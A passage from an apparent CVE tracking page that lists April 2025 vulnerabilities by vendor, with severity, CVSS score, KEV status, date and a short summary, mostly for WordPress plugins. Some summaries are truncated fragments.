CVE-2025-32684 | Medium | 5.0 | — | 2025-04-09 | Missing Authorization vulnerability in RomanCode MapSVG mapsvg-lite-interactive-vector-maps allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MapSVG: from n/a through <= 8.6.4. |
Samsung Mobile · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-20935 | Medium | 5.5 | — | 2025-04-08 | Improper handling of insufficient permission or privileges in ClipboardService prior to SMR Apr-2025 Release 1 allows local attackers to access files with system privilege. |
CVE-2025-20940 | Medium | 4.0 | — | 2025-04-08 | Improper handling of insufficient permission in Samsung Device Health Manager Service prior to SMR Apr-2025 Release 1 allows local attackers to access provider in SDMHS. |
Scand · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32517 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SCAND MultiMailer scand-multi-mailer allows Reflected XSS.This issue affects MultiMailer: from n/a through <= 1.0.3. |
CVE-2025-32505 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in SCAND MultiMailer scand-multi-mailer allows Stored XSS.This issue affects MultiMailer: from n/a through <= 1.0.3. |
Silverstripe · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30148 | Medium | 5.4 | — | 2025-04-10 | Silverstripe Framework is a PHP framework which powers the Silverstripe CMS. |
CVE-2025-25197 | Medium | 5.4 | — | 2025-04-10 | Silverstripe Elemental extends a page type to swap the content area for a list of manageable elements to compose a page out of rather than a single text field. |
Spider Themes · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32216 | Medium | 6.4 | — | 2025-04-10 | Missing Authorization vulnerability in Spider Themes Spider Elements spider-elements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Spider Elements: from n/a through <= 1.6.6. |
CVE-2025-32221 | Medium | 5.4 | — | 2025-04-10 | Missing Authorization vulnerability in Spider Themes EazyDocs eazydocs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EazyDocs: from n/a through <= 2.7.1. |
Spotfire · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3115 | Critical | 9.8 | — | 2025-04-09 | Injection Vulnerabilities: Attackers can inject malicious code, potentially gaining control over the system executing these functions. |
CVE-2025-3114 | — | — | — | 2025-04-09 | Code Execution via Malicious Files: Attackers can create specially crafted files with embedded code that may execute without adequate security validation, potentially leading to system compromise. |
Sqlite · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29088 | Medium | 5.6 | — | 2025-04-10 | In SQLite 3.49.0 before 3.49.1, certain argument values to sqlite3_db_config (in the C-language API) can cause a denial of service (application crash). |
CVE-2025-29087 | Low | 3.2 | — | 2025-04-07 | In SQLite 3.44.0 through 3.49.0 before 3.49.1, the concat_ws() SQL function can cause memory to be written beyond the end of a malloc-allocated buffer. |
Subnet Solutions · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31935 | Medium | 6.2 | — | 2025-04-11 | Subnet Solutions PowerSYSTEM Center is affected by a mishandling of exceptional conditions vulnerability. |
CVE-2025-31354 | Medium | 4.3 | — | 2025-04-11 | Subnet Solutions PowerSYSTEM Center's SMTPS notification service can be affected by importing an EC certificate with crafted F2m parameters, which can lead to excessive CPU consumption during the evaluation of the curve parameters. |
Tenda · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3346 | High | 8.8 | — | 2025-04-07 | A vulnerability was found in Tenda AC7 15.03.06.44. |
CVE-2025-3328 | High | 8.8 | — | 2025-04-07 | A vulnerability was found in Tenda AC1206 15.03.06.23. |
Verbb · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32427 | Medium | 5.4 | — | 2025-04-11 | Formie is a Craft CMS plugin for creating forms. |
CVE-2025-32426 | Medium | 4.6 | — | 2025-04-11 | Formie is a Craft CMS plugin for creating forms. |
Videx Inc. · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22375 | — | — | — | 2025-04-10 | An authentication bypass vulnerability was found in Videx's CyberAudit-Web. |
CVE-2025-22374 | — | — | — | 2025-04-10 | A Server-Side Request Forgery (SSRF) vulnerability was discovered in the videx-legacy-ssl web service of Videx’s CyberAudit-Web, affecting versions prior to 1.1.3. |
W. W. Norton · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32808 | High | 7.7 | — | 2025-04-11 | W. |
CVE-2025-32809 | Medium | 6.4 | — | 2025-04-11 | W. |
Wedevs · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2541 | Medium | 6.4 | — | 2025-04-11 | The WP Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.22 due to insufficient input sanitization and output escaping. |
CVE-2025-3100 | Medium | 6.4 | — | 2025-04-09 | The WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.22… |
Wpminds · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2004 | Critical | 9.1 | — | 2025-04-08 | The Simple WP Events plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the wpe_delete_file AJAX action in all versions up to, and including, 1.8.17. |
CVE-2025-32509 | High | 7.5 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WPMinds Simple WP Events simple-wp-events allows Path Traversal.This issue affects Simple WP Events: from n/a through <= 1.8.17. |
Yiiframework · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-58136 | Critical | 9.0 | KEV | 2025-04-10 | Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025. |
CVE-2025-32027 | Medium | 6.1 | — | 2025-04-10 | Yii is an open source PHP web framework. |
1000 Projects · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3384 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in 1000 Projects Human Resource Management System 1.0. |
1panel-dev · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32383 | Medium | 4.3 | — | 2025-04-10 | MaxKB (Max Knowledge Base) is an open source knowledge base question-answering system based on a large language model and retrieval-augmented generation (RAG). |
5sterrenspecialist · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32114 | High | 7.1 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 5sterrenspecialist WordPress 5sterrenspecialist Plugin 5-sterrenspecialist allows Reflected XSS.This issue affects WordPress 5sterrenspec… |
A.ankit · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31395 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in a.ankit Easy Custom CSS easy-custom-css allows Stored XSS.This issue affects Easy Custom CSS: from n/a through <= 1.0. |
Aaronfrey · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32128 | High | 7.6 | — | 2025-04-10 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in aaronfrey Nearby Locations nearby-locations allows SQL Injection.This issue affects Nearby Locations: from n/a through <= 1.1.1. |
Ab-tools · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32479 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in ab-tools Flags Widget flags-widget allows Stored XSS.This issue affects Flags Widget: from n/a through <= 1.0.7. |
Aba Bank · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32586 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ABA Bank ABA PayWay Payment Gateway for WooCommerce aba-payway-woocommerce-payment-gateway allows Reflected XSS.This issue affects ABA Pa… |
Abozain Albanna · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31034 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in AboZain Albanna Customize Login Page customize-login-page allows Cross Site Request Forgery.This issue affects Customize Login Page: from n/a through <= 1.1. |
Accredible · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-13909 | Medium | 4.9 | — | 2025-04-10 | The Accredible Certificates & Open Badges plugin for WordPress is vulnerable to time-based SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter an… |
Adam Nowak · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31033 | Critical | 9.8 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Adam Nowak Buddypress Humanity buddypress-humanity allows Cross Site Request Forgery.This issue affects Buddypress Humanity: from n/a through <= 1.2. |
Adrian Tobey · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31015 | High | 7.5 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Adrian Tobey WordPress SMTP Service, Email Delivery Solved! |
Agence Web Eoxia - Montpellier · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32576 | Critical | 9.6 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Agence web Eoxia - Montpellier WP shop wpshop allows Upload a Web Shell to a Web Server.This issue affects WP shop: from n/a through <= 2.6.1. |
Alimir · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32259 | Medium | 5.3 | — | 2025-04-10 | Missing Authorization vulnerability in Alimir WP ULike wp-ulike.This issue affects WP ULike: from n/a through <= 4.7.9.1. |
Amir Helzer · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-26888 | Medium | 5.3 | — | 2025-04-09 | Missing Authorization vulnerability in Amir Helzer WooCommerce Multilingual & Multicurrency woocommerce-multilingual allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Multilingual & Mult… |
Anantaddons · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32641 | Critical | 9.6 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in anantaddons Anant Addons for Elementor anant-addons-for-elementor allows Cross Site Request Forgery.This issue affects Anant Addons for Elementor: from n/a through <= 1.1.8. |
Ankit Singla · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32581 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ankit Singla WordPress Spam Blocker cf7-manual-spam-blocker allows Stored XSS.This issue affects WordPress Spam Blocker: from n/a through… |
Anytrack · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31041 | High | 7.5 | — | 2025-04-11 | Missing Authorization vulnerability in AnyTrack AnyTrack Affiliate Link Manager anytrack-affiliate-link-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AnyTrack Affiliate Link Manager: fro… |
Apeleghq · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32029 | — | — | — | 2025-04-07 | ts-asn1-der is a collection of utility classes to encode ASN.1 data following DER rule. |
Appsbd · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32642 | Critical | 10.0 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in appsbd Vite Coupon vite-coupon allows Remote Code Inclusion.This issue affects Vite Coupon: from n/a through <= 1.0.9. |
Aribhour · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31411 | Medium | 5.9 | — | 2025-04-10 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in aribhour Linet ERP-Woocommerce Integration linet-erp-woocommerce-integration allows Path Traversal.This issue affects Linet ERP-Woocommerce Int… |
Aristo Rinjuang · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32685 | High | 7.6 | — | 2025-04-09 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aristo Rinjuang WP Inquiries wp-inquiries allows SQL Injection.This issue affects WP Inquiries: from n/a through <= 0.2.1. |
Arm · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-0050 | Medium | 5.9 | — | 2025-04-07 | Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Arm Ltd Bifrost GPU Userspace Driver, Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a non-privile… |
Asaquzzaman Mishu · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31377 | High | 7.5 | — | 2025-04-09 | Missing Authorization vulnerability in Asaquzzaman mishu Woo Product Feed For Marketing Channels woocommerce-to-google-merchant-center allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Woo Product F… |
Asgaros · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32227 | Medium | 4.3 | — | 2025-04-10 | Authentication Bypass by Spoofing vulnerability in Asgaros Asgaros Forum asgaros-forum allows Identity Spoofing.This issue affects Asgaros Forum: from n/a through <= 3.0.0. |
Ashish Ajani · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32678 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Ashish Ajani WP Show Stats wp-show-stats allows Cross Site Request Forgery.This issue affects WP Show Stats: from n/a through <= 1.5. |
Ashokbasnet · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32664 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in ashokbasnet Nepali Date Utilities nepali-date-utilities allows Stored XSS.This issue affects Nepali Date Utilities: from n/a through <= 1.0.15. |
Athemes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32158 | High | 7.5 | — | 2025-04-10 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Syed Balkhi aThemes Addons for Elementor athemes-addons-for-elementor-lite.This issue affects aThemes Addons for Eleme… |
Austin · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31026 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Austin Comment Validation Reloaded comment-validation-reloaded allows Stored XSS.This issue affects Comment Validation Reloaded: from n/a through <= 0.5. |
Axew3 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32575 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in axew3 WP w3all phpBB wp-w3all-phpbb-integration allows Reflected XSS.This issue affects WP w3all phpBB: from n/a through <= 2.9.9. |
Ays Pro · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32275 | Medium | 4.3 | — | 2025-04-10 | Authentication Bypass by Spoofing vulnerability in Ays Pro Survey Maker survey-maker allows Identity Spoofing.This issue affects Survey Maker: from n/a through <= 5.1.6.3. |
Aytechnet · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30582 | High | 8.1 | — | 2025-04-10 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in aytechnet DyaPress ERP/CRM dyapress allows PHP Local File Inclusion.This issue affects DyaPress ERP/CRM: from n/a through <= 18.0.2.0. |
Azuread · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32016 | Medium | 4.7 | — | 2025-04-09 | Microsoft Identity Web is a library which contains a set of reusable classes used in conjunction with ASP.NET Core for integrating with the Microsoft identity platform (formerly Azure AD v2.0 endpoint) and AAD B2C. |
Azurecurve · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2809 | High | 7.3 | — | 2025-04-10 | The azurecurve Shortcodes in Comments plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.2. |
Bdoga · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31390 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in bdoga Social Crowd social-crowd allows Stored XSS.This issue affects Social Crowd: from n/a through <= 0.9.6.1. |
Benjamin Chris · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31035 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Benjamin Chris WP Editor.md – The Perfect WordPress Markdown Editor wp-editormd allows Stored XSS.This issue affects WP Editor.md – The P… |
Bentoml · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32375 | Critical | 9.8 | — | 2025-04-09 | BentoML is a Python library for building online serving systems optimized for AI apps and model inference. |
Bhoogterp · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31375 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in bhoogterp Scheduled scheduled allows Stored XSS.This issue affects Scheduled: from n/a through <= 1.0. |
Bjoern · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32485 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Bjoern WP Performance Pack wp-performance-pack allows Cross Site Request Forgery.This issue affects WP Performance Pack: from n/a through <= 2.5.4. |
Bluecms_project · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29150 | Medium | 4.3 | — | 2025-04-10 | BlueCMS 1.6 suffers from Arbitrary File Deletion via the id parameter in an /publish.php?act=del request. |
Blueinstyle · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32476 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in blueinstyle Advanced Tag Lists advanced-tag-list allows Stored XSS.This issue affects Advanced Tag Lists: from n/a through <= 1.2. |
Bozdoz · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32494 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in bozdoz reCAPTCHA Jetpack recaptcha-jetpack allows Cross Site Request Forgery.This issue affects reCAPTCHA Jetpack: from n/a through <= 0.2.2. |
Brainstormforce · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3102 | High | 8.1 | — | 2025-04-10 | The SureTriggers: All-in-One Automation Platform plugin for WordPress is vulnerable to an authentication bypass leading to administrative account creation due to a missing empty value check on the 'secret_key' value in the 'autheticate_use… |
Brian Batt - Elearningfreak.com · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32202 | Critical | 9.1 | — | 2025-04-10 | Unrestricted Upload of File with Dangerous Type vulnerability in Brian Batt - elearningfreak.com Insert or Embed Articulate Content into WordPress insert-or-embed-articulate-content-into-wordpress allows Upload a Web Shell to a Web Server… |
Broadstreet · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32211 | Medium | 6.5 | — | 2025-04-08 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Broadstreet Broadstreet Ads broadstreet allows Stored XSS.This issue affects Broadstreet Ads: from n/a through <= 1.52.1. |
C-ares · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31498 | — | — | — | 2025-04-08 | c-ares is an asynchronous resolver library. |
Canonical · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-24375 | Medium | 5.0 | — | 2025-04-09 | Charmed MySQL K8s operator is a Charmed Operator for running MySQL on Kubernetes. |
Cardgate · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32119 | High | 8.2 | — | 2025-04-10 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CardGate CardGate Payments for WooCommerce cardgate allows Blind SQL Injection.This issue affects CardGate Payments for WooCommerce: from… |
Ch-go · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-1386 | Medium | 4.9 | — | 2025-04-11 | When using the ch-go library, under a specific condition when the query includes a large, uncompressed malicious external data, it is possible for an attacker in control of such data to smuggle another query packet into the connection stre… |
Chandan Garg · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31399 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Chandan Garg CG Scroll To Top cg-scroll-to-top allows Stored XSS.This issue affects CG Scroll To Top: from n/a through <= 3.5. |
Chat2 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32584 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Chat2 Chat2 chat2 allows Cross Site Request Forgery.This issue affects Chat2: from n/a through <= 4.0. |
Checkmk · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-38865 | High | 8.8 | — | 2025-04-10 | Improper neutralization of livestatus command delimiters in a specific endpoint within RestAPI of Checkmk prior to 2.2.0p39, 2.3.0p25, and 2.1.0p51 (EOL) allows arbitrary livestatus command execution. |
Chillpay · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32570 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ChillPay ChillPay WooCommerce chillpay-payment-gateway allows Stored XSS.This issue affects ChillPay WooCommerce: from n/a through <= 2.5… |
Circl · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32413 | Medium | 6.4 | — | 2025-04-08 | Vulnerability-Lookup before 2.7.1 allows stored XSS via a user bio in website/web/views/user.py. |
Clickandpledge · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32550 | High | 7.2 | — | 2025-04-09 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ClickandPledge Click & Pledge Connect Plugin allows SQL Injection. |
Cmsjunkie - Wordpress Business Directory Plugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32629 | High | 8.6 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory wp-businessdirectory allows Path Traversal.This issue affects WP-Business… |
Codelit · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32816 | Low | 3.1 | — | 2025-04-11 | CodeLit CourseLit before 0.57.5 allows Parameter Tampering via a payment plan associated with the wrong entity. |
Connman · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32743 | Critical | 9.0 | — | 2025-04-10 | In ConnMan through 1.44, the lookup string in ns_resolv in dnsproxy.c can be NULL or an empty string when the TC (Truncated) bit is set in a DNS response. |
Consumer · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3329 | Low | 3.1 | — | 2025-04-07 | A vulnerability classified as problematic has been found in Consumer Comanda Mobile up to 14.9.3.2/15.0.0.8. |
Creativemindssolutions · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32210 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in CreativeMindsSolutions CM Registration and Invitation Codes cm-invitation-codes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CM Registration and Invitatio… |
Crocoblock · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22279 | High | 7.5 | — | 2025-04-10 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Crocoblock JetCompareWishlist jet-compare-wishlist allows PHP Local File Inclusion.This issue affects JetCompareWishli… |
Croover.inc · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31004 | Medium | 4.3 | — | 2025-04-09 | Missing Authorization vulnerability in Croover.inc Rich Table of Contents rich-table-of-content allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rich Table of Contents: from n/a through <= 1.4.0. |
Cyberdigm · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-11071 | High | 8.8 | — | 2025-04-07 | Permissive Cross-domain Policy with Untrusted Domains vulnerability in local API server of DestinyECM solution(versions described below) which is developed and maintained by Cyberdigm may allow Cross-Site Request Forgery (CSRF) attack, whi… |
Czater · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32624 | High | 7.1 | — | 2025-04-09 | Missing Authorization vulnerability in czater Czater.pl – live chat i telefon czater allows Cross Site Request Forgery.This issue affects Czater.pl – live chat i telefon: from n/a through <= 1.0.5. |
Dalziel · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32480 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in dalziel Windows Live Writer windows-live-writer allows Stored XSS.This issue affects Windows Live Writer: from n/a through <= 0.1. |
Danbwb · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31378 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in danbwb Oppso Unit Converter oppso-unit-converter allows Reflected XSS.This issue affects Oppso Unit Converter: from n/a through <= 1.1.1. |
Dangrossman · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32563 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in dangrossman WP Calais Auto Tagger calais-auto-tagger allows Cross Site Request Forgery.This issue affects WP Calais Auto Tagger: from n/a through <= 2.0. |
Debounce · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32580 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in debounce DeBounce Email Validator debounce-io-email-validator allows Stored XSS.This issue affects DeBounce Email Validator: from n/a thr… |
Detheme · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32260 | Medium | 5.3 | — | 2025-04-10 | Missing Authorization vulnerability in Detheme DethemeKit For Elementor dethemekit-for-elementor.This issue affects DethemeKit For Elementor: from n/a through <= 2.1.10. |
Digitalzoomstudio · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3431 | High | 7.5 | — | 2025-04-08 | The ZoomSounds - WordPress Wave Audio Player with Playlist plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 6.91 via the 'dzsap_download' action. |
Dimafreund · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32501 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in dimafreund Rentsyst rentsyst allows Stored XSS.This issue affects Rentsyst: from n/a through <= 2.0.92. |
Doa · 1 CVE
